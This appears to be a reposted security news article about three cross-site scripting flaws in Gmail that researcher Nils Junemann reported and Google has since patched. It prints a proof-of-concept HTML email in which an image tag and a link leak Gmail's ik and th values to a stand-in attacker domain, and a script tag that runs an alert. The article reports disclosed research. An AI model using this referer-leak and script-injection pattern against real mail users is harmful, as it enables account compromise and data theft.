Over the past few months, security researcher Nils Junemann has notified Google of the presence of serious persistent cross-site scripting (XSS) vulnerabilities that affected Gmail. The expert has revealed that all the security holes have been fixed.
In a blog post, Junemann detailed three different vulnerabilities that he had found in Gmail.
The first issue he describes refers to a persistent DOM XSSS flaw in Gmail’s mobile view. The weakness appeared when emails that contained a specific subject line were forwarded.
The second vulnerability reported by the expert was a common reflective DOM XSS in the mobile view.
A third issue he had found in Gmail turned out to be the more interesting.
Before completely patching the problem, Google’s Security Team blocked a particular GET parameter and displayed the following message for users: We're sorry ... but your computer or network may be sending automated queries. To protect our users, we can't process your request right now.
So, what did Junemann actually find?
He discovered that when Google displays a message directly, there are a couple of parameters in the URL that could be exploited by the attacker: ik (a static ID for that particular user) and th (the message ID).
According to the expert, an attacker could “force a 'HTTP/1.1 500 Internal Server Error' with some lines of the message” by using a specially crafted URL.
However, to create that special URL, the ik and th would have to be known, but the researcher has shown that the values can be easily obtained by relying on “referer leaking.”
By sending the victim an HTML email with some cleverly designed, yet simple, code, he was able to leak the values of ik and th to an arbitrary domain owned by the attacker.
Here’s what the HTML email looks like:
<img src="https://attackershost.com/1x1.gif">
<a rel="nofollow" rel="nofollow" href="https://attackershost.com/gmailxss">Click here to have fun</a>
<script>alert(/xss/)</script>
In the first line of code the 1x1.gif leaks the values to attackershost.com, while the second has the same effect once the victim clicks on the link.
The third line displays a simple alert to show that JavaScript can be executed in the context of Gmail.
Via: Google Addresses Persistent XSS Vulnerabilities in Gmail
Tidak ada komentar:
Posting Komentar